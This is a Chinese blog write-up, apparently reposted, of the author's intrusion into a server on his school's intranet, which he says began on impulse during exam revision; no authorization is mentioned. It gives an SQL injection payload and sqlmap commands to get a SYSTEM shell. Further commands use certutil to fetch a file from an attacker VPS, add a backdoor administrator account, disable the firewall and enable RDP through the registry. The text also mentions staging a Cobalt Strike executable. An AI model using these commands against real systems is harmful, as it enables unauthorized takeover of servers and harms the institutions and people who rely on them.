記一次不曲折的校内站點滲透

0x01 前言

備考的時候偶然點了進了本校内網的某個站點 , 停下了複習(直接拔劍)

0x02 滲透過程

測試到注入

http://url/newdetail.aspx?id=11999' or 1=1 --

直接Sqlmap一把過 , 連waf都沒得(狗頭)

随便看看

python  sqlmap.py -u "http://url/newdetail.aspx?id=119" --batch --dbs
python  sqlmap.py -u "http://url/newdetail.aspx?id=119" --batch -users
      

DBMS

sqlserver 2005

whoami

在windows中

nt authority system

 是内置的系統管理賬戶

檢視下目錄

chdir

Dir c:\

OS版本

Microsoft(R) Windows(R) Server 2003, Enterprise Edition

ipconfig

伺服器端存在certutil等于是決定測試一下指令

vps

python -m SimpleHTTPServer 80
      

打一下

ping wt070h.dnslog.cn
certutil.exe -urlcache -split -f http://funny_ip/amazing1x
      

發現回顯

奈何網站路徑是中文的 , sqlmap寫木馬的話會亂碼 , 找了找解決辦法無果

看看環境變量

Nmap看看端口

因為嘗試遠端連接配接的時候出了一些問題，起初不知道是什麼原因是以打算看看

嘗試遠端連接配接3389

建立使用者

#建立使用者
net user amazingadmin123 amazing.123456 /add
#賦予權限
net localgroup Administrators amazingadmin123 /add
#激活使用者
net user amazingadmin123 /active:yes
#關閉防火牆
netsh firewall set opmode mode=disable
#開啟預設設定 netsh firewall reset
      

通過系統資料庫開啟3389端口

echo Windows Registry Editor Version 5.00 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>3389.reg
echo "fDenyTSConnections"=dword:00000000 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>3389.reg 
echo "ortNumber"=dword:00000D3D >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>3389.reg
echo "PortNumber"=dword:00000D3D >>3389.reg
regedit /s 3389.reg           

相關記錄

這個過程連續嘗試了兩三次都沒有成功，也沒找到原因，服務還關了，隻能先考試等管理者開機了

考完試第三天網站上線了，再試試建立使用者……

原來是安全政策的問題，不能使用簡單地密碼，建立使用者的時候用了個複雜的密碼就行了

遠端連接配接✔️

配置加載中……

0x03  總結

1.發現首頁存在一處注入點

2.通過SQLMAP進行注入，執行指令：

sql-shell>select  @@version; //查詢資料庫版本

sql-os>whoami  //發現是system權限

sql-os>chdir   //檢視目錄

sql-os>dir c:   //列出C槽目錄

sql-os>systeminfo    //檢視系統版本

sql-os>ipconfig  //檢視系統IP

sql-os>cuertutil  //測試是否存在cuertutil 下載下傳指令

3.在VPS搭建HTTP伺服器

python -m SimpleHTTPServer 80

4.可以将cs生成exe上傳到VPS伺服器上。

5.通過NAMP掃描目标系統開放端口，發現3389存在

6.建立使用者并添加到管理者權限，且啟用賬号和關閉防火功能

#建立使用者

sql-os>net user amazingadmin123  Admin@12$12   /add

#賦予權限

sql-os>net localgroup Administrators   amazingadmin123    /add

#激活使用者

sql-os>net user amazingadmin123 /active:yes

#關閉防火牆

sql-os>netsh firewall set opmode mode=disable

7.通過mstsc成功遠端連接配接

原文連結： https://xz.aliyun.com/t/9444